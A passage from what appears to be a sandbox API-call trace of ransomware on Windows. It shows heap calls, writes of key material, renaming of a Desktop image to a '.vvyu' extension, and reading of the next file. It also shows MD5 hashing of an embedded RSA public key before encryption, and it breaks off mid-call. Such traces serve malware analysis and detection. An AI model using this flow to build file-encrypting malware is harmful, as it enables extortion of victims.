0x655b18 [0192.309] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x655b18, Size=0x218) returned 0x2e97810 [0192.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e97a30 [0192.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e97a30 | out: hHeap=0x620000) returned 1 [0192.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93600 [0192.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0192.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935b8 [0192.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93558 [0192.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0192.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0192.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0192.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0192.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e97810 | out: hHeap=0x620000) returned 1 [0192.312] GetCurrentThreadId () returned 0x66c [0192.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e260 [0192.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.313] GetCurrentThreadId () returned 0x66c [0192.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93600 [0192.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93558 [0192.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935b8 [0192.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93540 [0192.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93618 [0192.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0192.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935e8 [0192.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935d0 [0192.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93630 [0192.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935d0 [0192.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93558 [0192.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e97810 [0192.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0192.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e97a20 [0192.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0192.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e97c38 [0192.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e97a20 | out: hHeap=0x620000) returned 1 [0192.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e97c38 | out: hHeap=0x620000) returned 1 [0192.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95188 | out: hHeap=0x620000) returned 1 [0192.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e97810 | out: hHeap=0x620000) returned 1 [0192.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.327] WriteFile (in: hFile=0x568, lpBuffer=0x2e96a68*, nNumberOfBytesToWrite=0xd94, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e96a68*, lpNumberOfBytesWritten=0x312fb14*=0xd94, lpOverlapped=0x0) returned 1 [0192.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.327] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xd99, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.327] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e96a68 [0192.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e96a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e96e98 [0192.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.330] WriteFile (in: hFile=0x568, lpBuffer=0x2e96e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e96e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e98 | out: hHeap=0x620000) returned 1 [0192.330] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.330] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.330] CloseHandle (hObject=0x568) returned 1 [0192.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0192.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2e96a68 [0192.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0192.333] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\hSxa8JYxcBSx17jA94r_.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\hsxa8jyxcbsx17ja94r_.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\hSxa8JYxcBSx17jA94r_.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\hsxa8jyxcbsx17ja94r_.jpg.vvyu")) returned 1 [0192.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.337] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0192.340] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x132f3610, ftCreationTime.dwHighDateTime=0x1d8a5e3, ftLastAccessTime.dwLowDateTime=0xb7ae4320, ftLastAccessTime.dwHighDateTime=0x1d8a638, ftLastWriteTime.dwLowDateTime=0xb7ae4320, ftLastWriteTime.dwHighDateTime=0x1d8a638, nFileSizeHigh=0x0, nFileSizeLow=0x125e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I5zFv_jkMMjeubUquS.gif", cAlternateFileName="I5ZFV_~1.GIF")) returned 1 [0192.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95188 [0192.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0192.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95188 | out: hHeap=0x620000) returned 1 [0192.341] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\I5zFv_jkMMjeubUquS.gif") returned=".gif" [0192.341] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\I5zFv_jkMMjeubUquS.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\i5zfv_jkmmjeubuqus.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.341] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=75234) returned 1 [0192.341] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.345] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x125bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.345] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.348] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.348] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x125e2, lpOverlapped=0x0) returned 1 [0192.349] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.349] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.349] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.349] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.350] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.350] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.350] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.350] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.350] GetLastError () returned 0x0 [0192.350] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.350] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.350] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.350] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.351] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x125e0) returned 0x2ea79b0 [0192.351] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: 